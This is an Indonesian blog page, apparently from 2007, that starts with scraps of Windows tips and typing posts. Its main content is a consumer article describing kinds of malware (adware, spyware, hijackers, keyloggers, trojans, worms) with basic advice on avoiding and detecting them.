untuk akses lebih cepat dan lain sebagainya.
Semua hal di atas adalah sebagian kecil dari tip dan trik dasar Windows
yang kami sampaikan berikut ini. Semua tip dan trik di sini kami
padukan menjadi 150 langkah mudah dan aman untuk dilakukan. 150 tip dan trik,
termasuk beberapa panduan langkah demi langkah yang mudah berikut ini,
akan menjadikan komputer Anda lebih nyaman bekerja. Tentu saja,
akhirnya, produktivitas Anda di depan komputer kian berkembang.
Sebuah komputer yang nyaman saja belum cukup tanpa dibarengi
Instalasi program yang ada dalam tulisan ini kebanyakan berasal dari
situs resmi Microsoft. Sehingga kecil kemungkinannya program-program ini
menyebabkan error di PC. Jadi jangan ragu, ikuti terus tip dan trik
dasar pada Windows yang jarang terungkap!
Instalasi Windows yang Mudah dan Menyenangkan
Mengetik Sepuluh Jari
Hari gini masih belajar ngetik? Anak kecil aja bisa !!.....Mungkin hal itu yang ada di pikiran kalian melihat judul post diatas.Tapi apakah sobat menggunakan 10 jari ataukah 11 jari (seperti saya 
) untuk mengetik diatas keyboard....? Mungkin sebagian besar orang bisa mengetik dengan cepat atau tanpa melihat layout keyboard karena kebiasaan dan peletakan jari pada tuts keyboard yang berbeda. Terus bagaimana peletakan jari yang benar pada struktur QWERTY Keyboard ?
[Kiri] A S D F [Kanan] J K L ;
1. Jari berada diatas kunci utama dengan sedikit ditekuk
2. Pergelangan berada dalam posisi rendah tetapi tidak menyentuh rangka keyboard
akan ada backsound lucu yang bikin kita nyengir..
Senin, 03 September 2007
Macam-macam kutu internet dan cara mencegahnya
Dunia maya tidak lepas dari kutu digital / pests program. Bila Virus yang mengacaukan sistem computer sudah bermutasi menjadi alat penyerang sudah menjadi hal biasa. Tetapi saat ini yang lebih menjengkelkan saat ini adalah para kutu yang disebut dengan Adware, Spyware, Worm dan Trojan.
Disebut sebagai kutu internet karena sifatnya yang menganggu. Dan membuat gatal sebuah computer sampai menjadi parasit yang terus membebani sistem sebuah computer sampai network dan koneksi internet. Bila anda pertama kali merasakan computer begitu cepat, setelah beberapa waktu anda mengunakan internet maka computer perlahan lahan menjadi lambat. Kemungkinan kelambatan computer bisa disebabkan oleh salah satu jenis program Malware tersebut.
Macam-macam kutu internet antara lain:
Adware
Adware ada iklan yang dimasukan secara tersembunyi oleh pembuat program. Umumnya program diberikan secara gratis, tetapi dengan kompensasi pemakai harus menerima iklan pada program.
Browser Helper Object
BHO adalah pembajak yang menampilkan link pada toolbar. Umumnya BHO melakukan kegiatan mata mata untuk mencatat kegiatan netter, disamping tampilan browser anda ditambahkan toolbar khusus
Browser Hijackers
Browser anda dimasukan link tertentu. Dan memaksa anda masuk pada sebuah situs walaupun anda sudah benar mengetik alamat situs yang anda inginkan. Artinya, program Browser anda secara tidak langsung sudah dibajak dan diarahkan ke situs tertentu
Dialer
Memasukan fungsi otomatis untuk koneksi internet, bahkan secara diam diam program dapat aktif sendiri. Untuk kerugian, tagihan telepon anda mendadak membengkak
Drive-by downloads
Program yang di install tetapi tidak diketahui oleh pemilik computer. Cara ini memanfaatkan kelemahan pada IE.
Homepage Hijacking
Ini paling banyak dilakukan oleh pembuat Malware. Dengan menganti alamat homepage pada default browser dan tidak dapat dirubah walaupun anda sudah melakukan set ulang.
Keylogger
Program yang masuk dan mencatat apa yang anda ketik. Dan mengirim data ke server pembuat Malware.
Retrospies
Program Malware yang sengaja mencoba mematikan anti spyware.
Scumware
Diartikan sebagai program yang tidak dinginkan dan masuk ke computer tanpa ijin
Search Hijackers
Adalah kontrol yang dilakukan sebuah search engine pada browser. Bila salah menulis alamat, program biasanya menampilkan begitu banyak pop up iklan yang tidak karuan.
Surveillance Software
Salah satu program yang berbahaya. Karena mencatat kegiatan pada sebuah computer termasuk data penting, password dan lainnya. Program ini sangat pintar , dan baru mengirim data setelah seseorang selesai melakukan aktifitas.
Thiefware
Difungsikan untuk mengarahkan pengunjung situs dan mengarahkan ke situs lain yang mereka kehendaki. Cara ini tidak ilegal tetapi dinilai kasar
Trojan Horse
Adalah program dikategorikan sebagai virus. Fungsinya untuk mengkontrol computer yang terinfeksi
Dari nama nama diatas, perbedaan antara virus dengan kutu computer membuat program malware sulit dibedakan. Keduanya sama sama memiliki sifat yang kita tidak inginkan. Virus , Worm virus termasuk Trojan dapat dihadapi dengan program khusus yaitu AntiVirus. Sedangkan perkembangan kutu Adware dan Spyware internet harus dihadapi dengan anti spyware dan anti adware.
Walaupun agak sulit membedakan untuk dimasukan kedalam kategori apakah sebuah program malware. Dibawah ini adalah beberapa kategori dari penganggu computer yang ada saat ini. Untuk artikel dibawah ini, seluruh kategori pada tabel diatas dimasukan dalam kata program Malware.
Kategori untuk Trojan , Worm dan Hijacker
Trojan adalah replika atau duplikat virus. Trojan dimasukan sebagai virus karena sifat program yang tidak diinginkan dan bekerja dengan sendirinya pada sebuah computer. Sifat trojan adalah mengkontrol computer secara otomatis. Misalnya computer yang dimasuki trojan email. Trojan dimasukan dalam RATS (remote access trojans) dimana sebuah computer dikontrol oleh program tertentu, bahkan beberapa trojan difungsikan membuka computer agar dapat dimasuki oleh computer dan diaccess dari jauh.
Worm virus adalah virus. Kategori Worm dikelompokan sebagai si cacing internet. Fungsi utamanya untuk melakukan serangan dan menyebar serta mengambil data dan mengirim email secara diam diam dan acak. Tetapi saat ini juga dimanfaatkan untuk tujuan tertentu, misalnya mengirim data pada sebuah computer tanpa diketahui oleh pemiliknya. Batasan Worm untuk tujuan komersil atau non komersial menjadi tipis. Karena program dibuat untuk mengambil data dan dikirim ke tempat tertentu
Untuk Hijacker dimana seseorang masuk kesebuah situs, dan secara tidak sengaja mengclick sesuai permintaan pada tampilan situs. Disitulah program Hijacker bekerja, dan memasuki fungsi browser anda agar dikontrol sesuai keinginan mereka.
Spyware
Berbeda dengan Spyware yang berkonotasi dengan fungsi Spy atau memata matai. Spyware adalah program yang diam diam telah masuk kedalam computer dan mengambil data. Tujuan awal dari pembuatan Spyware adalah mencari data dari pemakai internet dan mencatat kebiasaan seseorang dalam menyelusuri dunia maya. Sayangnya, perkembangan Spyware tersebut dirusak dengan munculnya pencuri yang dapat mengambil data pada sebuah computer.
Bagaimana masuknya program spyware ini. Umumnya program jenis spyware masuk secara langsung dengan mengelabuhi pemakai internet. Bisa saja seseorang yang membuka sebuah website dan secara tidak sengaja menerima sebuah peringatan dan melakukan apa yang di kehendaki oleh si pembuat web. Spyware sebenarnya tidak berbahaya, karena hanya difungsikan untuk memata matai computer seseorang setelah berkunjung. Sayangnya semakin hari semakin berkembang, bahkan spyware sudah dijadikan alat untuk mencari data pribadi pada sebuah computer. Dan diam diam mengunakan koneksi internet anda tanpa diketahui dan computer sudah menjadi mata mata tanpa diketahui pemiliknya
Adware
Adware sebenarnya difungsikan sebagai promosi atau iklan berbentuk banner. Terkadang pemakai ingin mengunakan program shareware tetapi didalamnya terdapat program yang difungsikan sebagai Adware. Misalnya Program A yang diberikan secara gratis, ternyata memiliki jendela kecil pada program dan terus berganti ganti gambar iklan. Atau anda mengunakan Yahoo messenger dan pemilik Yahoo menempatkan banner iklan pada sebuah bagian di program Yahoo chat.
Kategori diatas masih dikatakan aman, pembuat program memberikan program gratis, sementara mendapatkan dana uang dari iklan yang ditempatkan pada programnya. Sayangnya program Adware mulai dimanfaatkan terlalu banyak. Terkadang mengambil bandwidth atau beban koneksi internet terlalu besar dan akhirnya membuat koneksi internet menjadi benar benar lambat dan menganggu computer ketika melakukan surfing. Terlebih adware yang sudah masuk kedalam computer dan menjakit didalam program Windows. Ketika seseorang membuka sebuah site maka yang muncul adalah link ke site yang ditentukan oleh program Adware. Hal paling menjengkelkan bila jenis Adware yang tidak dapat ditutup. Begitu satu pop iklan muncul ditutup, tidak lama lagi muncul pop baru yang lebih banyak.
Bahkan Adware dapat melakukan pekerjaan ganda yang dibutuhkan pada tampilan sebuah iklan atau si pembuat program memanfaatkan dengan merekam data netter. Misalnya mencari tahu kemana saja seorang pemakai computer melakukan surfing di internet atau ingin mengetahui apakah netter juga mengunjungi pihak perusahaan pesaing yang sama. Artinya dengan adanya Adware, Privasi seseorang mulai dapat dilihat oleh orang lain. Adware bukan tidak saja menganggu privasi seseorang, tetapi mencuri bandwidth internet anda secara diam diam.
Pengaman yang tidak selalu aman
Dengan antivirus yang terpasang tidak menjanjikan sebuah computer aman dari kutu digital. AntiVirus umumnya hanya ditujukan bagi virus penganggu dan sifatnya non-komersil. Virus umumnya dapat dibedakan dengan Malware memiliki sifat komersil. Tetapi apa artinya bila perbedaan hanyalah sebagai sebuah nama. Tetapi fungsinya tetap sama, yaitu menganggu computer bekerja dan merugikan pemakai computer
Spyware dan Adware akan efektif dihadapi dengan program tersendiri dan bukan oleh program Antivirus. Demikian juga dengan kemampuan dari pembuat Anti Spyware, kombinasi beberapa program Anti Spyware akan lebih efektif. Walaupun cara ini tidak menjamin 100% computer bebas dari program Malware. Karena sampai Oktober 2005, jenis Malware, Spyware dan Adware telah mencapai jumlah 45,000 lebih
Kerugian dengan adanya Malware pada sebuah computer
Paling awal untuk kerugian adalah koneksi bandwidth internet. Karena media internet menjadi salah satu keuntungan pembuat Malware. Koneksi internet akan menjadi lambat atau sangat lambat karena terus dibebani oleh program parasit
komputer juga menjadi lambat. Beberapa Malware masuk kedalam start-up System Windows tanpa diketahui pemilik computer. Bahkan beberapa program juga terus aktif dan memakan utilitas processor. Artinya, walaupun komputer sedang idle ternyata komputer sebenarnya masih terus bekerja dengan beban dari program Malware. Tentu dengan beban tersebut juga akan menarik daya listrik pada komputer serta membuat computer menjadi lambat
Pada Dialer, terkadang bisa melakukan link ke internet dengan sendirinya. Bila koneksi internet dilakukan dengan Dial-up. Diam diam Malware Dialer dapat aktif dengan sendirinya.
Komputer yang terinfeksi parasit tidak saja menjadi lambat ketika dinyalakan. Bila sudah terlalu banyak dapat membuat komputer menjadi sangat lambat bahkan crash.
Paling menganggu pada Hijacker, karena program browser anda yang diserang. Maka browser anda menjadi kacau. Mengetik alamat kesebuah situs yang benar bisa menjadi salah bila Browser sudah dimasuki program jenis Hijacker. Dan kontrol dari program Malware akan menganggu kenyamanan netter. Belum lagi muncul pop-up windows yang terus saja muncul. Kerugian pada Hijacker adalah waktu yang terbuang karena Browser dikacaukan untuk mengarahkan ke alamat site atau situs yang salah.
Dan masih banyak lagi dampak dari program Malware yang bisa dilakukan oleh si pembuat program.
Menghadapi kutu Digital dan worm virus
Pertama biasakan mendidik diri sendiri untuk tidak memasuki area terlarang atau wilayah berbahaya. Ungkapan ada gula pasti ada semut memang sulit dirubah. Beberapa netter ingin mencari informasi atau yah kita tahu lah didaerah apa yang terlihat menghibur dengan kesenangan sesaat. Ada baiknya menghindari area berbahaya tersebut, atau mempersiapkan computer untuk menghadapi site site berbahaya.
Biasakan tidak mengklik kata next pada situs tertentu. Umumnya situs yang memiliki program kutu internet mencoba mengakali pemakai internet. Cara menjebak pemakai banyak dilakukan oleh site site porno gratis atau software gratis misalnya dengan memberikan warning anda harus berumur 17 tahun dan anda harus menyetujui dengan mengclick icon mereka. Terserah apa yang anda click, sebenarnya tidak akan berbeda. Selanjutnya program di kirim ke computer anda dan selesai tugas mereka menjebak anda.
Jangan meng-klik sebuah link bila anda tidak yakin mendapatkan sebuah email yang tidak jelas. Bila anda mengatakan bahwa ini hanyalah sebuah link ke sebuah situs dan tidak berbahaya, kemungkinan pernyataan tersebut salah besar. Link yang ada bisa saja berhubungan dengan sebuah situs yang selalu telah siap menyerang computer anda. Beberapa kelemahan umumnya terjadi pada program Internet Explorer. Dan saat saat demikian memang sengaja ditunggu oleh pemiliki program menjebak netter yang tidak mengupdate program Internet Explorer.
Berhati hati dengan para pembuat program untuk digunakan secara gratis / freeware. Percayalah dari semua pembuat program kemungkinan ada yang tidak jujur. Dan anda dapat saja dimanfaatkan dengan kata kata gratis tetapi diam diam program mereka melakukan hal hal yang tidak anda inginkan. Hasilnya, biaya koneksi internet menjadi lebih mahal dibandingkan dengan membeli software sebenarnya.
Tolak semua yang meminta menginstall program. Dengan janji apapun yang terlihat legal sebenarnya use dipaksa untuk menerima program dari sebuah website agar dapat dimasukan Adware ataupun Spyware.
Matikan program tanpa dengan mematikan tanda X pada windows sebelah kanan atas. Dan jangan pernah mempercayai pilihan Yes, No dan lainnya yang disediakan. Karena kemungkinan pilihan tersebut semuanya berfungsi sama.
Matikan fungsi download ActiveX dari browse dan hanya menjalankan bila diperlukan.
Khususnya Internet Explorer dari Microsoft selalu menjadi target dari pembuat kutu dan memanfaatkan kelemahan program. Dan biasakan mengaktifkan auto update agar keamanan sistem operasi terus update.
Untuk keamanan lebih baik, gunakan program browser lain yang bukan menjadi target para kutu internet. Misalnya FireFox, AdvantBrowser, NetCaptor dan lainnya yang memiliki tambahan sistem pengaman untuk melakukan blocking pop windows. Pemakaian program tambahan dengan fasilitas Anti Pop membantu netter terhindari dari jebakan pop yang sering muncul dan menawarkan sesuatu. Tetapi tidak menjamin bahwa apa yang anda lakukan telah aman.
Matikan program Java dan Flash bila anda tidak mengunakan atau uninstall program dari harddisk. Beberapa kelemahan pada browser biasanya juga memanfaatkan lubang browser dengan Java.
Coba periksa dengan fungsi command dari Windows dengan NetStat. Dengan program ini, maka anda dapat mengetahui kemana computer anda sedang terhubung. Bila pertama computer dijalankan dan lampu network pada sebelah kiri bawah Windows anda terus berkedip. Curigai bahwa computer anda kemungkinan telah dimasuki program Malware. Caranya dengan membiarkan computer terhubung ke internet, dan diamkan beberapa saat. Jalankan kembali program NetStat dan lihat kemana saja computer mencoba melakukan koneksi ke jalur internet. Dalam kondisi diam atau anda tidak membuka aplikasi apapun, daftar IP pada Netstat akan kosong. Bila muncul daftar IP tertentu, waspadai computer anda sudah terjangkit Malware.
Matikan program pada start-up Windows. Untuk mudahnya, anda dapat mengunakan software Tune-up, atau msconfig (pilih start lalu run terus ketik msconfig) dan melihat file apa saja yang di loading ketika awal computer bekerja.
Perhatikan apakah pada daftar program terdapat program yang tidak dikenal. Tapi hal yang perlu diingat, program malware belum tentu dapat terlihat pada Star-Up dan tersembunyi didalam sistem Registry Windows. Membuang pada Start-Up Windows hanya efektif untuk mematikan Malware sederhana. Sedangkan yang lebih komplek lagi tidak dapat dimatikan dengan cara demikian.
Gunakan program Anti Spyware untuk menghadapi serangan Malware atau Spyware. Program Anti Spyware dapat mencegah masuknya program yang akan menganggu dan menyerang computer.
Jangan selalu mempercayakan 100% pada sebuah program. Cara terbaik terhindar dari program Malware adalah tidak menghubungkan computer pada jaringan internet.
Kombinasi pemakaian beberapa anti Spyware mungkin menjadi solusi terbaik. Karena tidak semua anti Spyware mampu membersihkan computer yang telah terjangkit Malware atau Spyware program.
sumber: Obengware